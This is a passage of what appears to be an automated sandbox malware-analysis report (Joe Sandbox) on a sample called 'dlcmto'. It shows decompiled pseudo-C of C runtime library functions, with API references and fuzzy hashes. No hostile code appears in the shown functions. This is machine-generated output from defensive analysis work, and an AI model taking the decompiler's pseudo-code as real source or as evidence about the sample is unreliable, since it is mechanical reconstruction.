					if(_t14 != 0) {
						 *0x11aa000(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                          0x01192ce7
                                          0x01192ceb
                                          0x01192cf6
                                          0x01192cfe
                                          0x01192d09
                                          0x01192d0f
                                          0x01192d13
                                          0x01192d1a
                                          0x01192d20
                                          0x01192d20
                                          0x01192d22
                                          0x01192d27
                                          0x00000000
                                          0x01192d2c
                                          0x01192d33

                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,01192D6B,?,?,01192DEC,?,?,?), ref: 01192CF6
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01192D09
                                          • FreeLibrary.KERNEL32(00000000,?,?,01192D6B,?,?,01192DEC,?,?,?), ref: 01192D2C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 12fa0ac9452b68840c763ba730d432681b5bba0a32e3ab42dba2d13ff8ff293a
                                          • Instruction ID: 50df7cafa45a85243434ee9e612e654c812a323f9744c7415d9c90655721f116
                                          • Opcode Fuzzy Hash: 12fa0ac9452b68840c763ba730d432681b5bba0a32e3ab42dba2d13ff8ff293a
                                          • Instruction Fuzzy Hash: A0F0A031A40218FBDF2A9B55ED0DBAD7EB9EF00766F900064F915A2050CB709F40DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01196FFA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01196FFA(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x11a7908; // 0x11a7958
					if(_t23 != 0) {
						E011963FE(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x11a790c; // 0x11a96a0
					if(_t24 != 0) {
						E011963FE(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x11a7910; // 0x11a96a0
					if(_t25 != 0) {
						E011963FE(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x11a7938; // 0x11a795c
					if(_t26 != 0) {
						E011963FE(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x11a793c; // 0x11a96a4
					if(_t27 != 0) {
						return E011963FE(_t6);
					}
				}
				return _t6;
			}










                                          0x01197000
                                          0x01197005
                                          0x01197009
                                          0x0119700f
                                          0x01197012
                                          0x01197017
                                          0x0119701b
                                          0x01197021
                                          0x01197024
                                          0x01197029
                                          0x0119702d
                                          0x01197033
                                          0x01197036
                                          0x0119703b
                                          0x0119703f
                                          0x01197045
                                          0x01197048
                                          0x0119704d
                                          0x0119704e
                                          0x01197051
                                          0x01197057
                                          0x00000000
                                          0x0119705f
                                          0x01197057
                                          0x01197062

                                          APIs
                                          • _free.LIBCMT ref: 01197012
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 01197024
                                          • _free.LIBCMT ref: 01197036
                                          • _free.LIBCMT ref: 01197048
                                          • _free.LIBCMT ref: 0119705A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: f4637ee0e52fb5a597b04303a6f0d913902d204fb8fa73c74acba05f6c7a0e73
                                          • Instruction ID: 3931f9d4fb07aacdef6390e39aec7bcb93ea5ed302b9801776fc42dc45cefd85
                                          • Opcode Fuzzy Hash: f4637ee0e52fb5a597b04303a6f0d913902d204fb8fa73c74acba05f6c7a0e73
                                          • Instruction Fuzzy Hash: 0DF04F36619204B7AB3CEA5CE581D067BD9EE15620BA8081AE178D75C4DB31FA908AB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119A44C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0119A44C(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E0119724E(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                          0x0119a459
                                          0x0119a461
                                          0x0119a496
                                          0x0119a463
                                          0x0119a46c
                                          0x00000000
                                          0x0119a493
                                          0x0119a492
                                          0x0119a492

                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0119A4E8,00000000,?,011A920C,?,?,?,0119A41F,00000004,InitializeCriticalSectionEx,011A106C,011A1074), ref: 0119A459
                                          • GetLastError.KERNEL32(?,0119A4E8,00000000,?,011A920C,?,?,?,0119A41F,00000004,InitializeCriticalSectionEx,011A106C,011A1074,00000000,?,01194BE1), ref: 0119A463
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0119A48B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          • Opcode ID: f1dd76f936f8b82e70e743d7bcfa0047e48bc799eebc165b1c100785fd7268d2
                                          • Instruction ID: f4f347f1c556df1968fe2bcfba1ae3ac3047a39760b4750e5075383c9620cbc4
                                          • Opcode Fuzzy Hash: f1dd76f936f8b82e70e743d7bcfa0047e48bc799eebc165b1c100785fd7268d2
                                          • Instruction Fuzzy Hash: 89E0DF30784305BBEF3A1F60FC0AB193E19AF00F40F644034FA2DAD4D1D7A2E5648A85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011977C1 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E011977C1(void* __ebx, signed int* _a4, intOrPtr* _a8) {
				signed int* _v0;
				signed int _v10;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v72;
				void* __esi;
				intOrPtr* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t87;
				signed int _t88;
				intOrPtr* _t98;
				signed int _t100;
				intOrPtr _t101;
				signed int _t105;
				signed int _t107;
				signed int _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t117;
				signed int _t119;
				signed int _t121;
				signed int _t122;
				signed int* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t133;
				signed int _t135;
				signed int _t143;
				intOrPtr* _t144;
				signed int _t152;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t158;
				signed int _t161;
				intOrPtr _t163;
				signed int* _t164;
				signed int* _t167;
				signed int _t168;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t174;
				signed int _t175;
				signed int* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;

				_pop(_t179);
				_t180 = _t182;
				_t79 = _a8;
				_t183 = _t182 - 0x28;
				_t187 = _t79;
				if(_t79 != 0) {
					_t167 = _v0;
					_t128 = 0;
					 *_t79 = 0;
					_t161 = 0;
					_t80 =  *_t167;
					_t131 = 0;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0;
					__eflags = _t80;
					if(_t80 == 0) {
						L10:
						_v12 = _t128;
						_t82 = _t131 - _t161;
						_t168 = _t161;
						_v16 = _t168;
						_t151 = (_t82 >> 2) + 1;
						_t84 = _t82 + 3 >> 2;
						__eflags = _t131 - _t168;
						_v20 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t170 =  !_t168 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t170;
						if(_t170 != 0) {
							_t117 = _t161;
							_t158 = _t128;
							do {
								_t144 =  *_t117;
								_t20 = _t144 + 1; // 0x1
								_v24 = _t20;
								do {
									_t119 =  *_t144;
									_t144 = _t144 + 1;
									__eflags = _t119;
								} while (_t119 != 0);
								_t128 = _t128 + 1 + _t144 - _v24;
								_t117 = _v16 + 4;
								_t158 = _t158 + 1;
								_v16 = _t117;
								__eflags = _t158 - _t170;
							} while (_t158 != _t170);
							_t151 = _v20;
							_v12 = _t128;
							_t128 = 0;
							__eflags = 0;
						}
						_t171 = E01193043(_t84, _t151, _v12, 1);
						_t184 = _t183 + 0xc;
						__eflags = _t171;
						if(_t171 != 0) {
							_v16 = _t161;
							_t87 = _t171 + _v20 * 4;
							_t132 = _t87;
							_v32 = _t87;
							_t88 = _t161;
							_v20 = _t87;
							__eflags = _t88 - _v44;
							if(_t88 == _v44) {
								L25:
								_v16 = _t128;
								 *_a4 = _t171;
								_t172 = _t128;
								goto L26;
							} else {
								_t154 = _t171 - _t161;
								__eflags = _t154;
								_v36 = _t154;
								do {
									_t98 =  *_t88;
									_t155 = _t98;
									_v28 = _t98;
									_v24 = _t155 + 1;
									do {
										_t100 =  *_t155;
										_t155 = _t155 + 1;
										__eflags = _t100;
									} while (_t100 != 0);
									_t101 = _t155 - _v24 + 1;
									_push(_t101);
									_v24 = _t101;
									_t105 = E0119BAB9(_t132, _v32 - _t132 + _v12, _v28);
									_t184 = _t184 + 0x10;
									__eflags = _t105;
									if(_t105 != 0) {
										_push(_t128);
										_push(_t128);
										_push(_t128);
										_push(_t128);
										_push(_t128);
										E011964E1();
										asm("int3");
										_push(_t180);
										_push(_t171);
										_t175 = _v72;
										_push(_t161);
										__eflags = _t175;
										if(_t175 != 0) {
											_t163 = 0;
											__eflags =  *_t175;
											if( *_t175 != 0) {
												_t107 = E011973AB(_a8, 9, _t175, 0xffffffff, 0, 0);
												__eflags = _t107;
												if(__eflags != 0) {
													_t164 = _v0;
													__eflags = _t107 -  *((intOrPtr*)(_t164 + 0xc));
													if(__eflags <= 0) {
														L45:
														_t108 = E011973AB(_a8, 9, _t175, 0xffffffff,  *((intOrPtr*)(_t164 + 8)),  *((intOrPtr*)(_t164 + 0xc)));
														__eflags = _t108;
														if(__eflags == 0) {
															goto L42;
														} else {
															_t113 = _t108 - 1;
															__eflags = _t113;
															 *(_t164 + 0x10) = _t113;
															goto L47;
														}
													} else {
														_t112 = E0119782A(_t164, __eflags, _t107);
														__eflags = _t112;
														if(_t112 == 0) {
															goto L45;
														}
													}
												} else {
													L42:
													E01196E65(GetLastError());
													_t112 =  *(E01196E3F(__eflags));
												}
											} else {
												_t177 = _v0;
												__eflags =  *(_t177 + 0xc);
												if(__eflags != 0) {
													L40:
													 *((short*)( *((intOrPtr*)(_t177 + 8)))) = 0;
													goto L36;
												} else {
													_t112 = E0119782A(_t177, __eflags, 1);
													__eflags = _t112;
													if(_t112 == 0) {
														goto L40;
													}
												}
											}
										} else {
											_t177 = _v0;
											E01197869(_t177);
											_t163 = 0;
											__eflags = 0;
											 *((intOrPtr*)(_t177 + 8)) = 0;
											 *(_t177 + 0xc) = 0;
											L36:
											 *((intOrPtr*)(_t177 + 0x10)) = _t163;
											L47:
											_t112 = 0;
											__eflags = 0;
										}
										return _t112;
									} else {
										goto L24;
									}
									goto L49;
									L24:
									_t116 = _v16;
									_t143 = _v20;
									 *((intOrPtr*)(_v36 + _t116)) = _t143;
									_t88 = _t116 + 4;
									_t132 = _t143 + _v24;
									_v20 = _t143 + _v24;
									_v16 = _t88;
									__eflags = _t88 - _v44;
								} while (_t88 != _v44);
								goto L25;
							}
						} else {
							_t172 = _t171 | 0xffffffff;
							_v16 = _t172;
							L26:
							E011963FE(_t128);
							_pop(_t133);
							goto L27;
						}
					} else {
						do {
							_v12 = 0x3f2a;
							_v10 = _t128;
							_t121 = E0119BB80(_t80,  &_v12);
							_t133 =  *_t167;
							__eflags = _t121;
							if(_t121 != 0) {
								_t122 = E01197D84(_t167, _t133, _t121,  &_v48);
								_t183 = _t183 + 0xc;
								_v16 = _t122;
								_t172 = _t122;
							} else {
								_push( &_v48);
								_t172 = E01197CD3(_t133, _t167, _t133, _t128, _t128);
								_t183 = _t183 + 0x10;
								_v16 = _t172;
							}
							__eflags = _t172;
							if(_t172 != 0) {
								_t161 = _v48;
								L27:
								_t152 = _t161;
								_v36 = _t152;
								__eflags = _v44 - _t152;
								asm("sbb ecx, ecx");
								_t135 =  !_t133 & _v44 - _t152 + 0x00000003 >> 0x00000002;
								__eflags = _t135;
								_v32 = _t135;
								if(_t135 != 0) {
									_t174 = _t135;
									do {
										E011963FE( *_t161);
										_t128 = _t128 + 1;
										_t161 = _t161 + 4;
										__eflags = _t128 - _t174;
									} while (_t128 != _t174);
									_t161 = _v48;
									_t172 = _v16;
								}
								E011963FE(_t161);
								goto L32;
							} else {
								goto L8;
							}
							goto L49;
							L8:
							_t167 =  &(_v0[1]);
							_v0 = _t167;
							_t80 =  *_t167;
							__eflags = _t80;
						} while (_t80 != 0);
						_t161 = _v48;
						_t131 = _v44;
						goto L10;
					}
				} else {
					_t125 = E01196E3F(_t187);
					_t172 = 0x16;
					 *_t125 = _t172;
					E011964D1();
					L32:
					return _t172;
				}
				L49:
			}





























































                                          0x011977c6
                                          0x011978df
                                          0x011978e1
                                          0x011978e4
                                          0x011978e8
                                          0x011978ea
                                          0x01197900
                                          0x01197904
                                          0x01197907
                                          0x01197909
                                          0x0119790b
                                          0x0119790d
                                          0x0119790f
                                          0x01197912
                                          0x01197915
                                          0x01197918
                                          0x0119791a
                                          0x0119797d
                                          0x0119797f
                                          0x01197982
                                          0x01197984
                                          0x01197988
                                          0x01197991
                                          0x01197992
                                          0x01197995
                                          0x01197997
                                          0x0119799a
                                          0x0119799e
                                          0x0119799e
                                          0x011979a0
                                          0x011979a2
                                          0x011979a4
                                          0x011979a6
                                          0x011979a6
                                          0x011979a8
                                          0x011979ab
                                          0x011979ae
                                          0x011979ae
                                          0x011979b0
                                          0x011979b1
                                          0x011979b1
                                          0x011979bc
                                          0x011979be
                                          0x011979c1
                                          0x011979c2
                                          0x011979c5
                                          0x011979c5
                                          0x011979c9
                                          0x011979cc
                                          0x011979cf
                                          0x011979cf
                                          0x011979cf
                                          0x011979dc
                                          0x011979de
                                          0x011979e1
                                          0x011979e3
                                          0x011979fb
                                          0x011979fe
                                          0x01197a01
                                          0x01197a03
                                          0x01197a06
                                          0x01197a08
                                          0x01197a0b
                                          0x01197a0e
                                          0x01197a6b
                                          0x01197a6e
                                          0x01197a71
                                          0x01197a73
                                          0x00000000
                                          0x01197a10
                                          0x01197a12
                                          0x01197a12
                                          0x01197a14
                                          0x01197a17
                                          0x01197a17
                                          0x01197a19
                                          0x01197a1b
                                          0x01197a21
                                          0x01197a24
                                          0x01197a24
                                          0x01197a26
                                          0x01197a27
                                          0x01197a27
                                          0x01197a2e
                                          0x01197a31
                                          0x01197a35
                                          0x01197a42
                                          0x01197a47
                                          0x01197a4a
                                          0x01197a4c
                                          0x01197ac0
                                          0x01197ac1
                                          0x01197ac2
                                          0x01197ac3
                                          0x01197ac4
                                          0x01197ac5
                                          0x01197aca
                                          0x01197acd
                                          0x01197ad0
                                          0x01197ad1
                                          0x01197ad4
                                          0x01197ad5
                                          0x01197ad7
                                          0x01197af3
                                          0x01197af5
                                          0x01197af8
                                          0x01197b23
                                          0x01197b2b
                                          0x01197b2d
                                          0x01197b45
                                          0x01197b48
                                          0x01197b4b
                                          0x01197b59
                                          0x01197b67
                                          0x01197b6f
                                          0x01197b71
                                          0x00000000
                                          0x01197b73
                                          0x01197b73
                                          0x01197b73
                                          0x01197b74
                                          0x00000000
                                          0x01197b74
                                          0x01197b4d
                                          0x01197b50
                                          0x01197b55
                                          0x01197b57
                                          0x00000000
                                          0x00000000
                                          0x01197b57
                                          0x01197b2f
                                          0x01197b2f
                                          0x01197b36
                                          0x01197b41
                                          0x01197b41
                                          0x01197afa
                                          0x01197afa
                                          0x01197afd
                                          0x01197b00
                                          0x01197b0f
                                          0x01197b14
                                          0x00000000
                                          0x01197b02
                                          0x01197b06
                                          0x01197b0b
                                          0x01197b0d
                                          0x00000000
                                          0x00000000
                                          0x01197b0d
                                          0x01197b00
                                          0x01197ad9
                                          0x01197ad9
                                          0x01197ade
                                          0x01197ae3
                                          0x01197ae3
                                          0x01197ae5
                                          0x01197ae8
                                          0x01197aeb
                                          0x01197aeb
                                          0x01197b77
                                          0x01197b77
                                          0x01197b77
                                          0x01197b77
                                          0x01197b7c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197a4e
                                          0x01197a4e
                                          0x01197a54
                                          0x01197a57
                                          0x01197a5a
                                          0x01197a5d
                                          0x01197a60
                                          0x01197a63
                                          0x01197a66
                                          0x01197a66
                                          0x00000000
                                          0x01197a17
                                          0x011979e5
                                          0x011979e5
                                          0x011979e8
                                          0x01197a75
                                          0x01197a76
                                          0x01197a7b
                                          0x00000000
                                          0x01197a7b
                                          0x0119791c
                                          0x0119791c
                                          0x0119791f
                                          0x01197927
                                          0x0119792a
                                          0x01197931
                                          0x01197933
                                          0x01197935
                                          0x01197953
                                          0x01197958
                                          0x0119795b
                                          0x0119795e
                                          0x01197937
                                          0x0119793a
                                          0x01197943
                                          0x01197945
                                          0x01197948
                                          0x01197948
                                          0x01197960
                                          0x01197962
                                          0x011979f0
                                          0x01197a7c
                                          0x01197a7f
                                          0x01197a83
                                          0x01197a8c
                                          0x01197a8f
                                          0x01197a93
                                          0x01197a93
                                          0x01197a95
                                          0x01197a98
                                          0x01197a9a
                                          0x01197a9c
                                          0x01197a9e
                                          0x01197aa3
                                          0x01197aa4
                                          0x01197aa8
                                          0x01197aa8
                                          0x01197aac
                                          0x01197aaf
                                          0x01197aaf
                                          0x01197ab3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197968
                                          0x0119796b
                                          0x0119796e
                                          0x01197971
                                          0x01197973
                                          0x01197973
                                          0x01197977
                                          0x0119797a
                                          0x00000000
                                          0x0119797a
                                          0x011978ec
                                          0x011978ec
                                          0x011978f3
                                          0x011978f4
                                          0x011978f6
                                          0x01197abb
                                          0x01197abf
                                          0x01197abf
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free_strpbrk
                                          • String ID:
                                          • API String ID: 3300345361-0
                                          • Opcode ID: bda19d7ccd6eda8565635fa3cb6ba869e4ce1bba604ab6411c39544b5cae7ffd
                                          • Instruction ID: 5a10773bffc458d872df8bcd246c3503234ed631c91c1e127fc416754ec0ce8f
                                          • Opcode Fuzzy Hash: bda19d7ccd6eda8565635fa3cb6ba869e4ce1bba604ab6411c39544b5cae7ffd
                                          • Instruction Fuzzy Hash: A3613D75D10219AFDF19CFA8C8809EDFBF5EF48214B19816AD865E7340E735AE418B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119D3A1 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0119D3A1(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E0119D511( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E01196E3F(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E0119A08D(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E01198B88(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E0119A08D(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E01196E3F(__eflags))) = 0xd;
						_t36 = E01196E52(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E011971A3(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E01193BF5(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E0119AB0C(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E01196E52(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E01196E3F(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E01196E3F(_t70)));
										E011963FE(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E01193BF5(_t56, _t50, _v12);
							E011963FE(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E01196E3F(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}


























                                          0x0119d3a1
                                          0x0119d3aa
                                          0x0119d3b9
                                          0x0119d3c7
                                          0x0119d4f0
                                          0x0119d4f5
                                          0x00000000
                                          0x0119d3dc
                                          0x0119d3dc
                                          0x0119d3df
                                          0x0119d3e2
                                          0x0119d3e5
                                          0x0119d3e7
                                          0x0119d4ac
                                          0x0119d4b5
                                          0x0119d4bc
                                          0x0119d4bf
                                          0x0119d4c2
                                          0x00000000
                                          0x00000000
                                          0x0119d4d2
                                          0x0119d4d4
                                          0x0119d479
                                          0x0119d479
                                          0x0119d4f7
                                          0x0119d502
                                          0x0119d510
                                          0x0119d510
                                          0x0119d4db
                                          0x0119d4e1
                                          0x0119d4ee
                                          0x00000000
                                          0x0119d4ee
                                          0x0119d3ed
                                          0x0119d403
                                          0x0119d406
                                          0x0119d407
                                          0x0119d409
                                          0x0119d424
                                          0x0119d427
                                          0x0119d42a
                                          0x0119d42b
                                          0x0119d42b
                                          0x0119d42d
                                          0x0119d440
                                          0x0119d440
                                          0x0119d442
                                          0x0119d445
                                          0x0119d44a
                                          0x0119d44d
                                          0x0119d450
                                          0x0119d482
                                          0x0119d485
                                          0x0119d48c
                                          0x0119d48c
                                          0x0119d492
                                          0x0119d498
                                          0x0119d49a
                                          0x00000000
                                          0x0119d49f
                                          0x0119d452
                                          0x0119d453
                                          0x0119d455
                                          0x0119d458
                                          0x0119d45a
                                          0x0119d45d
                                          0x0119d45f
                                          0x0119d439
                                          0x0119d439
                                          0x00000000
                                          0x0119d439
                                          0x0119d461
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119d461
                                          0x0119d42f
                                          0x00000000
                                          0x00000000
                                          0x0119d431
                                          0x0119d437
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119d463
                                          0x0119d463
                                          0x0119d463
                                          0x0119d46b
                                          0x0119d471
                                          0x0119d476
                                          0x00000000
                                          0x0119d476
                                          0x0119d410
                                          0x00000000
                                          0x0119d4a2
                                          0x0119d4a2
                                          0x0119d4a4
                                          0x00000000
                                          0x00000000
                                          0x0119d4a6
                                          0x00000000
                                          0x00000000
                                          0x0119d4a8
                                          0x0119d4aa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119d4aa
                                          0x0119d3ed

                                          APIs
                                          • _free.LIBCMT ref: 0119D471
                                          • _free.LIBCMT ref: 0119D49A
                                          • SetEndOfFile.KERNEL32(00000000,0119CA90,00000000,01199280,?,?,?,?,?,?,?,0119CA90,01199280,00000000), ref: 0119D4CC
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,0119CA90,01199280,00000000,?,?,?,?,00000000,?), ref: 0119D4E8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID:
                                          • API String ID: 1547350101-0
                                          • Opcode ID: b7337bfa7ba460ed2c7fe9f0f9f434b72708023a19ff6af37e560c29f12ad3e6
                                          • Instruction ID: 807c8d37c7a11a958ba056f1663ce8be036757353ba04ad5ad9cccf2302dbe65
                                          • Opcode Fuzzy Hash: b7337bfa7ba460ed2c7fe9f0f9f434b72708023a19ff6af37e560c29f12ad3e6
                                          • Instruction Fuzzy Hash: BA41C172900206ABDF1DABFCEC44BDE3BB5EF94324F190550E934A7590EB30E8518761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197B7D Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01197B7D(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
